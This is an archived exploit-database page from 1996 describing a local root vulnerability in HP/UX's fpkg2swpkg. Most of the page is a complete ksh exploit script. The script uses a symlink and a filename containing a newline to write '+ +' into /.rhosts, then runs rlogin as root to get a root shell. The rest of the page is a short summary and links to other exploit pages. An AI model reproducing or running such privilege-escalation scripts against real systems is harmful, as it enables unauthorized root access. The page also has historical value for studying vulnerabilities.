SOD HP/UX /tmp/fpkg2swpk bug

Summary
Description:Standard buffer overflow
Author:Dog Catcher
Compromise: root (local)
Vulnerable Systems:HP/UX with vulnerable fpkg2swpk, probably just 10.x
Date:November 1996
Notes:See the SOD HP Bug of the Week page
Details

Exploit: 

#!/bin/ksh
# giveroot Version 1.1 (C) 1996 Dog Catcher
# gives you root by poking + + into /.rhosts
# this version even works on mode 600 /.rhosts
# tested on HP/UX 10.01

# setup stuff
FILE=/tmp/fpkg2swpk
LOG=/tmp/fpkg2swpkg.log
DUMMY=/tmp/"`echo '\n+ +'`"
SUCKER=/usr/sbin/fpkg2swpkg
RHOSTS=/.rhosts

# naughty bits
touch ${FILE}
rm -f ${LOG}
ln -s ${RHOSTS} ${LOG}
ln -s ${SUCKER} "${DUMMY}"
"${DUMMY}" ${FILE}

# tidy up
rm -f ${FILE} "${DUMMY}" ${LOG}

# i wanna hash prompt
rlogin `uname -n` -l root
More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]